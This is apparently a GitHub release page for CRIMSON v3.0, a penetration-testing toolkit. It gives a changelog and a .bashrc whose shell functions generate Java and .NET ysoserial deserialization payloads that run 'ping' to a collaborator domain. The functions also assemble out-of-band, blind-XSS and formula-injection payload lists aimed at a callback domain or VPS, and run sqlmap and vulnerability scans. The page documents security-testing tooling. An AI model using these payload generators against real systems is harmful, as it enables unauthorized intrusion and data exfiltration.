Skip to content

CRIMSON v3.0

Latest
Latest
Compare
Choose a tag to compare
@Karmaz95 Karmaz95 released this 19 Aug 20:43
· 163 commits to master since this release
v3.0
6df84bf

CHANELLOG

MAJOR CHANGES

  • Changed operation system from UBUNTU to Kali
  • Changed .bashrc aliases.
  • All modules were rebuilt.
  • Added new module crimson_IPcon - for IP-only assessment.
  • Active Directory enumeration & vulnerability scanning was added in crimson_IPcon.
  • No more port scanning on crimson_recon and crimson_target. If you need this functionality, use crimson_IPcon.
  • No more Python 2.7 code ( there are still some scripts in the /scripts/ directory, but the modules do not use them. I decided to leave them there, so I can rewrite the code if needed to python3 or GO in the future)
  • testssl, wpscan and jwt_tool transferred from crimson_exploit to crimson_target
  • testssl transferred from crimson_exploirt to crimson_target
  • crimson_exploit does not need domain anymore, just the params.txt | all.txt | dirs.txt files
  • Added sstimap.py to the SSTI testing in the crimson_exploit module
  • It is possible now to use the crimson_exploit module without a domain name. Just place the dirs.txt and params.txt in the current directory and run the script.

MINOR CHANGES

  • crimson_faker.py script => Template for generating fake data for API testing.
  • crimson_target - dig_for_secret functions were moved out. It will be a part of the 5th module for the static code analysis in the next patch.
  • New for flag crimson_target -n to skip brute-forcing directories.
  • All banners were removed from modules
  • Nuclei run with headless mode
  • You can use c_0, c_1, c_2, and c_3 aliases instead of crimson_MODULE-NAME
  • Removed some static_code analysis functions from modules and placed them in the future c_4 module named crimson_lang.

NEW .BASHRC

### PATHS 
export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
export CRIMSON_PATH=/root/tools/crimson

### CRIMSON
alias crimson="cd $CRIMSON_PATH"
alias c_0="$CRIMSON_PATH/crimson_IPcon"
alias c_1="$CRIMSON_PATH/crimson_recon"
alias c_2="$CRIMSON_PATH/crimson_target"
alias c_3="$CRIMSON_PATH/crimson_exploit"

### TOOLS
alias bat="batcat"
alias fd="fdfind"
alias cme="crackmapexec"
alias quickpress="/root/tools/quickpress/quickpress"
alias sss="python3 -m http.server 80"
alias psbase64_encode="iconv -t utf-16le | base64 -w 0"
alias parse_nmap="ultimate-nmap-parser.sh *.gnmap --all"
alias grep_domain="awk -F/ '{print $3}' | sort -u"
alias ferox="feroxbuster -C 400,404 --auto-tune  -nEgBekr --wordlist $HOME/tools/crimson/words/dir -o ferox.txt -I 3gp,aac,apng,avif,bmp,class,com,css,cur,doc,flac,gif,gz,ico,jar,jfif,jpeg,jpg,m4a,m4p,m4v,mov,mp3,mp4,mpeg,mpg,oga,ogg,ogv,pdf,pif,pjp,pjpeg,png,ram,scr,snp,svg,swf,tgz,tif,tiff,wav,webm,webp,woff,xls -u"


### FUNCTIONS
function gen_net_ysoserial() {
    # GENERATE YSOSERIAL PAYLOADS USING GADGETS FROM $HOME/tools/crimson/words/exp/netgadgets
    # ARG[1] is the collaborator domain
    # EXAMPLE: gen_net_ysoserial DOMAIN.BRUP.COM
    for gadget in $(cat "$HOME/tools/crimson/words/exp/netgadgets")
    do 
        wine "$HOME/tools/crimson/scripts/GOAST/net-ysoserial-135/ysoserial.exe" -f BinaryFormatter -g "$gadget" -o base64 -c "ping $1" /nogui >> net_deserialization_payloads.txt
    done
}
function gen_java_ysoserial() {
    # GENERATE YSOSERIAL PAYLOADS USING GADGETS FROM $HOME/tools/crimson/words/exp/jargadgets
    # ARG[1] is the collaborator domain
    # EXAMPLE: gen_java_ysoserial DOMAIN.BRUP.COM
    for gadget in $(cat "$HOME/tools/crimson/words/exp/jargadgets")
    do 
        java -jar "$HOME/tools/ysoserial/ysoserial.jar" $gadget "$1" | base64 -w0 >> temp_payloads.txt && echo >> temp_payloads.txt
    done
    sed '/^$/d' temp_payloads.txt > java_deserialization_payloads.txt
    rm temp_payloads.txt
}

function rr {
        ulimit -n 5000
        rustscan -a "$1" -- -n -A -Pn --script discovery,vuln --append-output -oA scan
}

function sqli {
        sqlmap -b -o -v 0 --banner -u "$1"
}

function words {
    # Java deserialization payload URLDNS (* swap the java path if does not work)
    java -jar "$HOME"/tools/crimson/scripts/GOAST/ysoserial.jar URLDNS "http://$1" | base64 -w0 |sed "s/$/\n/g" > oob.fuzz
    # Preparing OOB payloadlist and copying it to the clipboard
    cat "$HOME"/tools/crimson/words/exp/OOB | sed "s/domain_collab/$1/g" |sed "s/vps_ip/$2/g" >> oob.fuzz1
    cat oob.fuzz1 | sed "s/$2:80/$2:$3/g" >> oob.fuzz && rm oob.fuzz1
    cat "$HOME"/tools/crimson/words/exp/BLIND_XSS | sed "s/domain_collab/$1/g" >> oob.fuzz
    cat oob.fuzz | clip.exe
    # Preparing other wordlists and files to upload
    cat "$HOME"/tools/crimson/words/bug >> bug.fuzz
    cat "$HOME"/tools/crimson/words/exp/http_leaks | sed "s/domain_collab/$1/g" >> http_leaks
    cat "$HOME"/tools/crimson/words/exp/bypass_ext >> bypass_ext
    cat "$HOME"/tools/crimson/words/exp/BLIND_XSS | sed "s/domain_collab/$1/g" >> BLIND_XSS
    cat "$HOME"/tools/crimson/words/exp/headers | sed "s/domain_collab/$1/g" >> headers.fuzz
    # Preparing upload
    mkdir upload
    cd upload
    cp "$HOME"/tools/crimson/upload/* .
    cat exiftool.jpg | sed "s/domain_collab/$1/g" >> 123 && mv 123 exiftooldomain.jpg
    cat exiftool.jpg | sed "s/domain_collab/$2:$3/g" >> 123 && mv 123 exiftoolvps.jpg
    cat formula_injections.txt | sed "s/domain_collab/$1/g" |sed "s/vps_ip/$2/g" >> formula_injections1
    cat formula_injections1 | sed "s/$2:80/$2:$3/g" >> formula_injections.txt && rm formula_injections1
    cd ..
}

WHAT IS NEXT?

  • crimson_lang module is on the way.
  • New module will cover Whitebox testing for many different programming languages.
Assets 2
Loading